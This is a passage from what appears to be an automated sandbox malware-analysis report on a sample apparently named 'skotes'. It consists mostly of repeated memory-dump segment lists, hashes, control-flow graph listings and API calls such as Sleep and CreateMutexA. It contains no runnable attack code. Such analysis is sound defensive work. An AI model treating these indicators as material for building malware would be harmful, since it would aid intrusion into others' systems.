                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 791168284ab8bdffd905ea26b3930bd0ed53a5c0c11a03c699392ff00d7817f8
                                                                                                                                                                                                                                                  • Instruction ID: c27499aae65d49bd100cc4a46b8810fa71bf84f888e8d06f4786f3e69a74a666
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 791168284ab8bdffd905ea26b3930bd0ed53a5c0c11a03c699392ff00d7817f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2315B31A041009BEB08EB7CDD89B6DB762EFC1334F244618E494EB3E5D77999C0A762

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 164 f3a54d-f3a56d 168 f3a59b-f3a5b7 164->168 169 f3a56f-f3a57b 164->169 172 f3a5e5-f3a604 168->172 173 f3a5b9-f3a5c5 168->173 170 f3a591-f3a598 call f4d663 169->170 171 f3a57d-f3a58b 169->171 170->168 171->170 176 f3a944-f3a949 call f66c6a 171->176 174 f3a632-f3a916 call f480c0 172->174 175 f3a606-f3a612 172->175 178 f3a5c7-f3a5d5 173->178 179 f3a5db-f3a5e2 call f4d663 173->179 180 f3a614-f3a622 175->180 181 f3a628-f3a62f call f4d663 175->181 190 f3a94e 176->190 191 f3a949 call f66c6a 176->191 178->176 178->179 179->172 180->176 180->181 181->174 194 f3a953-f3a994 Sleep CreateMutexA 190->194 195 f3a94e call f66c6a 190->195 191->190 198 f3a9a7-f3a9a8 194->198 199 f3a996-f3a998 194->199 195->194 199->198 200 f3a99a-f3a9a5 199->200 200->198
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: ee46c17a802ed30259055b6687d22391df4539cf182fb850cb7d33082195ef1d
                                                                                                                                                                                                                                                  • Instruction ID: 6b5a5d7cf0ca15a8674ec0eb99b556b6decd7f53fd2f746ff2fabdd77cdb70fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee46c17a802ed30259055b6687d22391df4539cf182fb850cb7d33082195ef1d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5315B31A011008BFB08EB7CDD89B6DB762EFC5334F244618E494EB3D1C7399981A722

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 202 f3a682-f3a6a2 206 f3a6d0-f3a6ec 202->206 207 f3a6a4-f3a6b0 202->207 210 f3a71a-f3a739 206->210 211 f3a6ee-f3a6fa 206->211 208 f3a6b2-f3a6c0 207->208 209 f3a6c6-f3a6cd call f4d663 207->209 208->209 212 f3a949 208->212 209->206 216 f3a767-f3a916 call f480c0 210->216 217 f3a73b-f3a747 210->217 214 f3a710-f3a717 call f4d663 211->214 215 f3a6fc-f3a70a 211->215 218 f3a94e 212->218 219 f3a949 call f66c6a 212->219 214->210 215->212 215->214 223 f3a749-f3a757 217->223 224 f3a75d-f3a764 call f4d663 217->224 225 f3a953-f3a994 Sleep CreateMutexA 218->225 226 f3a94e call f66c6a 218->226 219->218 223->212 223->224 224->216 234 f3a9a7-f3a9a8 225->234 235 f3a996-f3a998 225->235 226->225 235->234 236 f3a99a-f3a9a5 235->236 236->234
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 798b2f965591c3c3a07e4b03f4bb173803223279a12f387a2e0eed1d7a376eb3
                                                                                                                                                                                                                                                  • Instruction ID: eddb198ee17208de2387b3999949a9f8b8e4eb287bc3d8e059c0bc1b65aa9e4d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 798b2f965591c3c3a07e4b03f4bb173803223279a12f387a2e0eed1d7a376eb3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB314831A042008BEB08EB7DDDC9B6DBB62DB82334F248618E454E73D1C7799980A762

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 f39adc-f39ae8 239 f39aea-f39af8 238->239 240 f39afe-f39b27 call f4d663 238->240 239->240 241 f3a917 239->241 247 f39b55-f39b57 240->247 248 f39b29-f39b35 240->248 243 f3a953-f3a994 Sleep CreateMutexA 241->243 244 f3a917 call f66c6a 241->244 254 f3a9a7-f3a9a8 243->254 255 f3a996-f3a998 243->255 244->243 252 f39b65-f39d91 call f47a00 call f35c10 call f38b30 call f48220 call f47a00 call f35c10 call f38b30 call f48220 247->252 253 f39b59-f3a916 call f480c0 247->253 250 f39b37-f39b45 248->250 251 f39b4b-f39b52 call f4d663 248->251 250->241 250->251 251->247 255->254 259 f3a99a-f3a9a5 255->259 259->254
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
